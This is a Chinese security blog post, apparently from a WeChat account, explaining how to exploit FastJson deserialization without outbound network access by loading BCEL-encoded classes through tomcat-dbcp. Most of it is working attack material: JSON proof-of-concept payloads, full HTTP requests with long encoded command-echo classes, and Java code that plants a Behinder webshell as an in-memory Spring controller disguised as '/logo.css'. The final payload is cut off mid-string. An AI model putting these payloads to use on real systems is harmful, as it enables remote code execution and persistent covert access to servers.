声明:本公众号所发布的文章及工具只限交流学习,如有侵权,请告知我们立即删除,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任
FastJson这个漏洞之家不管是安全中的利用还是开发中的数据转换,都是老生常谈的东西了,在这里同大家再补习一下,并且深入利用一下吧。
0x01 背景
在我们发现FastJson准备要去利用的时候,会去利用JdbcRowSetImpl利用链进行JDNI注入去返连等手段进行注入从而打到命令控制,但是也会有不出网的情况我们就无法去用上述情况,所以很多大佬从而研究了很多目标不出网情况下怎么可以达到命令控制。
0x02 BCEL
既然我们要利用bcel编码去进行字节码的注入,从而达到不出网利用的目的。那什么是BCEL呢?
BCEL的全名应该是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。就这个库的功能来看,其使用面远不及同胞兄弟们,但是他比Commons Collections特殊的一点是,它被包含在了原生的JDK中,位于com.sun.org.apache.bcel,但是注意的是在JDK- 8u251之后的BCEL中没有类加载器。
BCEL这个包中有个类com.sun.org.apache.bcel.internal.util.ClassLoader,他是一个ClassLoader,但是他重写了Java内置的ClassLoader#loadClass()方法。 在ClassLoader#loadClass()中,其会判断类名是否是$$BCEL$$开头,如果是的话,将会对这个字符串进行decode。可以理解为是传统字节码的HEX编码,再将反斜线替换成$。默认情况下外层还会加一层GZip压缩。
让我们来用代码验证一下,我们先随意写一个恶意类,弹一个计算机先。
先利用调用BCEL
那就把这个恶意类先给编码一下
所以说刚才的计算机恶意类被编码了,所以我们利用BCEL解码
懂的师傅看到loadClass其实就已经明白了,在解码后调用了类加载器,将这个恶意类给加载了,所以在本地进行了命令执行。
讲完了BCEL,大家也应该明白BCEL怎么操作了,接下来就看看怎么在FastJson中使用了。
0x03 FastJson中bcel的使用
1准备环境
FastJson<=1.2.24
tomcat-dbcp
JDK <= 8u251(之后的bcel中没有类加载器)
注入点我们就先简单一个调用和返回
2 POC
给大家先贴一下poc,看一下。
{{"aaa": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",//这里是tomcat>8的poc,如果小于8的话用到的类是//org.apache.tomcat.dbcp.dbcp.BasicDataSource"driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$..."}}: "bbb"}
单单从poc字面意思看,无非就是多个类加载器的套娃,tomcat中的类加载器,调用了becl中的类加载器,最终调用了咱们编码的恶意类。
内部情况是什么,咱们可以跟一下看看。
利用链:
BasicDataSource.getConnection()=>createDataSource()=>createConnectionFactory()其实看到这个利用链,就知道传入我们的BasicDataSource类,会自动调用getter和setter方法,然后调用getConnection方法。我们在getConnection打断点调试一下,可以看到我们在BasicDataSource里存入的恶意代码都已经存入,继续跟createDataSource
进入到return的函数里面,跟进发现,会判断dataSource是够为空,然后调用createConnectionFactory(就是创建链接工厂方法),继续跟进。
到了这里就很清楚了,通过class.forName方法,使用我们自定义的classloder(com.sun.org.apache.bcel.internal.util.ClassLoader),获取该类
然后实例化,导致加载恶意类的内容
至此BCEL中的类加载器就被调用完了,执行了我们编码的恶意类。
流程走完计算机也弹出来了。
3替换回显POC
把恶意类换成网上的springecho,都市公开的恶意类,各大插件里也都有运用,tomcat回显无非也是调用Response,Request的get,set方法,这里面也都调用,咱们把这个类进行BCEL编码进行测试
POST /test HTTP/1.1Host: 127.0.0.1:8999sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1cmd: whoamiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/jsonContent-Length: 3280{{"x":{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}}: "x"}
0x04打入冰蝎内存马
上述所有的流程基本阐述的也差不多了,现在咱们想打内存马,无非就是怎么利用BCEL的类加载器进行打入。
现在网上找一个Java类的冰蝎马
马子有了,如何注入呢?
当时也有点蒙,但是基本思路也是,既然是内存马,肯定是要注册一个接口,接口的内容肯定是咱们这个Java类的冰蝎内存马。
所以开始寻找网上的注册接口的例子
经过不懈努力,总算找到了一个,
package com.fastjson.vul.bcel;import java.lang.reflect.*;import java.util.concurrent.ConcurrentHashMap;import java.lang.reflect.*;import java.util.concurrent.ConcurrentHashMap;public class LoadInjectToController {static {try {ClassLoader springClassload = Thread.currentThread().getContextClassLoader();Field resourcesField = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getDeclaredField("resources");resourcesField.setAccessible(true);Object context = resourcesField.get(Thread.currentThread().getContextClassLoader());Field contextField = context.getClass().getDeclaredField("context");contextField.setAccessible(true);Object context2 = contextField.get(context);Field context2Field = context2.getClass().getSuperclass().getDeclaredField("context");context2Field.setAccessible(true);Object context3 = context2Field.get(context2);Field attributesField = context3.getClass().getDeclaredField("attributes");attributesField.setAccessible(true);ConcurrentHashMap attributesMap = (ConcurrentHashMap) attributesField.get(context3);Object springRoot = attributesMap.get("org.springframework.web.context.WebApplicationContext.ROOT");Field applicationEventMulticasterField = springRoot.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField("applicationEventMulticaster");applicationEventMulticasterField.setAccessible(true);Object applicationEventMulticaster = applicationEventMulticasterField.get(springRoot);Field retrievalMutexField = applicationEventMulticaster.getClass().getSuperclass().getDeclaredField("retrievalMutex");retrievalMutexField.setAccessible(true);ConcurrentHashMap retrievalMutex = (ConcurrentHashMap) retrievalMutexField.get(applicationEventMulticaster);Constructor patternsRequestCondition = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.servlet.mvc.condition.PatternsRequestCondition").getConstructor(String[].class);// PatternsRequestCondition url = new PatternsRequestCondition("/cmd");// String[] urls = {"/cmd"};Object url = patternsRequestCondition.newInstance(new Object[]{new String[]{"/logo.css"}});// 5. 定义允许访问 controller 的 HTTP 方法(GET/POST)// RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();Constructor msConstructor = springClassload.loadClass("org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition").getConstructor(Array.newInstance(springClassload.loadClass("org.springframework.web.bind.annotation.RequestMethod"), 1).getClass());Object ms = msConstructor.newInstance(new Object[]{Array.newInstance(springClassload.loadClass("org.springframework.web.bind.annotation.RequestMethod"), 0)});// RequestMappingInfo info = new RequestMappingInfo((PatternsRequestCondition) url, ms, null, null, null, null, null);Constructor requestMappingInfoConstructor = springClassload.loadClass("org.springframework.web.servlet.mvc.method.RequestMappingInfo").getConstructor(springClassload.loadClass("org.springframework.web.servlet.mvc.condition.PatternsRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.ParamsRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.HeadersRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.ConsumesRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.ProducesRequestCondition"), springClassload.loadClass("org.springframework.web.servlet.mvc.condition.RequestCondition"));Object info = requestMappingInfoConstructor.newInstance(url, ms, null, null, null, null, null);Object bcelclassLoader = springClassload.loadClass("com.sun.org.apache.bcel.internal.util.ClassLoader").newInstance();Method loadClassmethod = bcelclassLoader.getClass().getMethod("loadClass", String.class);Class ob1 = (Class) loadClassmethod.invoke(bcelclassLoader, "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$fb$7f$iU$V$ff$dedwgvv$b6$8f$ed$p$jl$L$r$b4$e4$d1fK$9b$AYB$db$q$q$q4iC6$s$86$e0cvw6$d9f$b2$b3$9d$99$cd$c3$b7$f8$W$VE$ab$a2$b5$88$C$a5$82$d8$fa$d8$U$w$V$b5$CE$8d$afj$7f$f2$t$fe$A$7f$c3$l$f0$D$9e$3b3$bb$c9f$b7$d8$7c6w$ee$3d$e7$dc$efy$dcs$ce$9dy$fd$ed$X$_$Ch$c5$3f$r$i$c4$3c$l$W$f8$f0a$J$l$c1G$f9$f01$R$l$e7$94O$88$f8$a4$80OI$I$e2$n$B$9f$96$f0$Z$7cVB$I$9f$T$f1y$R_$Q$91$S$f0E$R_$92$b0$k$P$8b$f8$b2$80$afH$d8$84$af$8axD$c4$d7D$7c$5d$c4$a3$o$be$n$e2$9b$oN$88$f8$96$88o$8b$f8$8e$88$c7D$7cW$c4$f7$q$9c$c4$f7$F$9c$92$b0$T$8f$L$f8$81$84$5b$f9$f3$J$O$f7C$J$8d$f8$R$97xR$c0S$S$f6p$ce$d3$S$a2$98$X$91$O$e14$9e$R$a1$8aH$K8$p$a1$8d$bb$d1$86$ls$f9g$r$i$c0s$dc$e6$9fp$5b$l$W$f0$bc$84$O$be$fd$a7$C$ce2$E$3a2$d9$8c$7d$80$a1$b6$a1q$94$c1$d7m$a44$86$b5$D$99$acv$q$3f$93$d0$cc$R5$a1$T$r2$60$qU$7dT53$7c$ed$R$7d$f6T$c6bh$gH$g3$d1$b4j$d9$c7$y$p$h$9d$cd$eb$d1DR$d3$a3$fd$d9cZ$d2$k1$ba$8d$acm$g$ba$ae$99w1$dc$d00pL$9dU$a3$ba$9a$9d$8cv$eb$aae$N$Yj$8aX$5c$3dK2$d4$5d$83$cf$b0nP$b3$a7$8c$d4$90j$aa3$9a$ad$99$a4$9aM2lj$98$e8j$5c$bd$89$c4Y$82$a1f$a2$8b$9b$a9Y6$c3$WW$scD$bb$f2$e9$b4fj$a9a$cdC$Wr$ea$82Nj$b8$9f$cb$40q$db$ccd$t$89$j$9833$a4$af$9c$7b4$c1$bd$e3z$u$S$9eS$96$96$cc$93$e8B$f4$88$R$cf$t$a7$3a$f5I$83$96S3$3d$f3I$zgg$8c$y$89$eftD$e7$a3Is$ng$h$9e$e4$90$9aJ$91$ae$95r$f5$ab$m$fb$b3$b3$aa$9eI$j$d6$WVJ$85r$ea$a4$c6$D$ac$cd$db$fc$dc$9c$3dy$3b$a3G$H$d5$i$f17$ad$b0x$e5$3e$d9$caq$e7$dc$d82l$t$r$a6$96$b5$87$b5$e3y$KV$a7M$ae$t$f2$U77$e4tl$xpL$z$ad$93$ebQ$97$c7$c3gj$c7$7b$d5$q$c5a$dd$a4V$c4$u$ee$e4$cc$bcs$A$eb$j$a6$953$b2$96V$e4$8a$a6G$60$I$S$bbHf$d3$b4$d1$d2$y$8b$ac$z$3aQ$KYw$s7$e5$i$db$e6$f2$a4$5c$c8$V$T$b3$ad$3c$O$j$95$87Zy$90$H$I0$i$b7$d5$e44$edpp$dc$g$Rp$8e$aa$9dJ$5b$c0$cf$a8$3c$a92$a9$E$a9$8c$Y$a4R$40$v$T$a5$b8$917$93Zo$86$eb$af$abL$fd$W$aeP$c6$nt$f2$e1$5e$Z$3f$c7$_$E$fcRF$B$8b2$ce$e3$F$86$O$c3$9clq$cf$r$cdS$7c$ce0$a7$5b$e6$b4DK$d2$3d$df$W$_$92$z$5e$84$bdc$ef3t$3aC$Z$_$e2$C$r$f9$b5$O$92$92cU$89$c8H$e1Wtd$ab$pA$O$cbx$J$Xe$fc$g$_$93c$cbGJ$e9$b6$e2$I$cb$b6$baa$a5Z$h$3a$g$l$91$f1$h$fc$d6$3dP$b7$c4$e8$a8$aa$d7$9e$8c$df$e1$92$x$d9$e7I$b2$i$D$5c$d2$98Wv$C$8f$89$adS$s$f82$d3yz$f8$d3z$de$9a$a2gR7$iC$b4$d66m$ff$be$f6$b4$96hK$b5$efkK$b8f$c7$8b$J$q$e6$f2$f6$a8$aa$e7I$94$e5$a9$d7u$f6$c4$e94e$fc$k$af0$ec$ba$be$d2$95$f1$w$3a$a9$y$af$a3z$Zn$y$93$b2rZ2$g$d7$92$a6fS$f9$c6i$r$e35$5c$e6$89$f0$ba$8c$3f$e0$8f$M$3b$feo$b1S$fd$y$tu$9fjMQ$9a$K$f8$93$8c$r$fc$99$e2k$e5$b3$d1$99$8c$95$8cvu$c6$7bno$bdGK$gN$7c$ff$82$bf$ca$f8$h$fe$$$e30$Gd$5c$c1$3f$Y6T$e9$J$d4$c3$ae$b7$8bSAVm$d1$94$7d$d7j$S$9e$ceU$rL$f9$94$d2$d2t$d58$mT6$d4$c9$fb$fb$ab$f5$f2$V$9962ej$bcS$87$bdL$_$ae76$ac$dc$e8Ry$D$a4$3c$f0$K$a5$ccT$a5$a1BO$e9$a2$J$f2$bb$c0$b3igCe$f3$a8f$e1$a1$wr$T$Vr$8d$ef$d6F$D$99$ec$ac1M9$da$deP$d9$9e$s$wI$8d$d5n$p$91$fb$eb$9a$be$a1$d2E$ae$85jY$d5$z$7eoV$81$7c$c0i$c9j$8a$bf$A$ac$8ei$e9$3e$e4$5d$a0$3fk$d9j$96$f7$fc$c6kF$a8$b2c$afu$w$d9$e9$b2$p$a6scp$7b$bb$W$9c$G$e5kh$e4$d75$cf$82$w$88$fc$ed$84$bf$abp$81$feUw$p$d5$89$p$Q$$k$fbT$e8T$f7$MwVq$f4$3a$a3$v$a7$9c$3ar$9b$WUY5W$b9$cdB$ca$e8$cddU$9d$c2$cb$dfF8$v$94$d5$e6$96$83T$kI$P$l$3b$e8$e5$ec$m$f8$9f$8fZ$k$dd$N4v$d1j$3f$3d$a9$L$c2$df$b4$Iv$8e$s5$e8$a6Q$a2$t$b0$86$84$d7$e1$k$9a$c9$ae$Qz$d0$eb$80$d0$bdB$S$i$e0$A$3d$b9l$a0$a9y$R5$ab$R6$d0$9e$8d$O$c2fW$aa$84$Q$40$l$fa$J$f5$3e$8e$cbh$c1$5b15$O$P$f6nR$cd7$E$9b$9ak$9b$_$$$a2$f6l$J9$e0$d8R$b7$C5XB$Nb$QG$96Q$H$j$d4$a3$e4$ad$83$ea$d3h$f3$g$c2$b9$e5$3c$7c$F$f8$H$9a$p$81$C$84$88X$fb$S$82$FH$83$bb$5d$C$zC$F$c8G$f6$U$Q$8e$ac$f1$981$9f$e2$db$e3qb$7e$87$b5$b6$c8$K$u$81$SKP$fc$9c$b7$ce$e3$v$7e$8f$f12$d6$c7DE$8cD$K$d8$f0$Y$g$5d$a9$8d$95R$9bb$92$o$V$b09$W$3c$8d$t$5d$a9$3a$lI$8d$d7F$d6$c7$jQZ$85h$b5$r$ee$a1$G$95$e0$x$I$x$c1$88$e2$40$h$8a$c07$ddP$84$$$ba$e3$e2$86$p$ef$vC$93$3c$b4$ad$im$cc$95$d8V$dc$wy$5b$3d$fa$f6$K$fa$b9$c8$8d$E$eb$Yy$d3jWb$n$r$c4$Z$3b$fcE$7d$e3$beH$c8Q$g$f2$bbJo$s$92$o9$9aYL$8e$d4$9f$c7$z1$f946$c6$c2J$b8$80$5d$a7$v$b4$ce$acA$91$fd$X$d08$ce$cdh$8a$d4$_$a2$b9$80$dd$rn$cb$FD$c7$X$b1$97$af$o$b7$v$a1$X$b0$af$Wc4$df$af$f8K$f3VEp$e7M$8a$7c$Bm$q$7f$bbB$e6$deQ$c0$9d$F$b4$X$Q$e3Hw$8d$95$40$ef$3e$H$l$3b$c1N$b2$c7$b1$d3y$9e$c1$ad$ec$y$bb$c4$5e$c5$k$b6T$a3$d4l$a5$8f$h$9f$93$90$cf$a3$99$c6$ad$Q$b0$8d$d2r$3bv$e1$s$fa$u$daAYw3$86P$8f$H$e9$3bk$9e$3e$ab$kB$TN$91$ecS$d8$8dg$e8$cbj$J$z$f8$X$7dY$bd$89$bdl$Lnc$7b$b1$8f$f5a$3f$eb$c7$jl$Q$ed$y$8d$Y$7b$U$j$ec$E$O$b0$93$e8$sK$O$b2$tp$88$3dM$f33$f4$86$f0$y$ba$d8Y$f4$b0K$e8$p$abz$d9e$dc$cb$96p$l$bb$8a$c3$ec$N$M$b0$7fc$90$bd$85$a35$K$86$c9$da$a1$9a$ed$b8$bf$a6$kq$a7p$ae$d0$f7$e2$v$b2x$90$y$94$c8$a2Z$dc$8fa$w$9f7$89$l$c7$I$q$d2$e4$c7$7b1$8a0$e9$e1$b31$9a$5dvf$ef$a3$d9U$aa$a7q$3c$800$a1r$da$E$c2$bc$ae$bcB$Uj$b6$91$d7$bc$bc$ebj$c2x$3f$3e$40$f5$b7$8b$bd$8d$P$Sr$z$da$c8$b2$P$R$cdG$3e$bc$B$95h$7e$M$b1$xH$Q$z$80$H$d9kH$SM$c0$3c$7b$8e$5e$i$87$nb$89$8d$ba$f6Q$5c$aeB$a3$99D$d1$b9$884$c9$85$u$3e$8fP$ff$98$a4$s5$e5$b6$w$cf$ba$M$d9t$8c$u$G$a4w$u$e0A$B$d3$Ct$B3$C$b2$e5$a3$B$fc$X$ad$f4$7c$L$d3$ef$907$e1w$R$z$feh$9e$D$Tp$bc_$80$Z$Y$V$60$F$fe$83A$Bv$Ay$af$cdv$d0$ff$ac$d3$b7$e6$fe$H$k$d9$d4H$fd$P$A$A");Method method2 = ob1.getMethod("test");Object injectToController = ob1.newInstance();Method registerMethod = retrievalMutex.get("requestMappingHandlerMapping").getClass().getSuperclass().getSuperclass().getDeclaredMethod("registerMapping", Object.class, Object.class, Method.class);registerMethod.invoke(retrievalMutex.get("requestMappingHandlerMapping"), info, injectToController, method2);} catch (NoSuchFieldException e) {e.printStackTrace();} catch (IllegalAccessException e) {e.printStackTrace();} catch (ClassNotFoundException e) {e.printStackTrace();} catch (InvocationTargetException e) {e.printStackTrace();} catch (NoSuchMethodException e) {
将这个注册接口的类进行编码并且尝试。
看到咱们的mapper注册成功!
访问一下
注入成功
冰蝎连接一下测试
连接成功,完成!
0x05拓展
目前利用1.2.47的缓存机制,可以打到1.2.47版本
1.2.33<=fastjson<=1.2.47
POST /json HTTP/1.1Host: 127.0.0.1:9092Content-Type: application/jsoncmd: whoamiContent-Length: 3647{"xx":{"@type" : "java.lang.Class","val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"x" : {"name": {"@type" : "java.lang.Class","val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"},{"@type":"com.alibaba.fastjson.JSONObject","c": {"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$e